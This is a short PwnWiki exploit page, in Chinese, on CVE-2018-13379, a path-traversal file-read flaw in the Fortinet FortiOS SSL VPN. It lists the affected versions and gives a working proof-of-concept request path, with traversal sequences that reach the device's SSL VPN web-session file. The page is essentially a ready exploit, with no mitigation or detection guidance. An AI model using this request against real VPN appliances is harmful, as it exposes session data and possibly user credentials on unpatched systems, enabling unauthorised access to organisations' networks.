CVE-2018-13379 Fortigate SSL VPN 任意文件讀取漏洞

From PwnWiki

漏洞影響

Fortinet FortiOS 5.6.3版本至5.6.7版本、Fortinet FortiOS 6.0.0版本至6.0.4版本中的SSL VPN 受此漏洞影響。

POC

/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2018-13379_Fortigate_SSL_VPN_任意文件讀取漏洞&oldid=1880"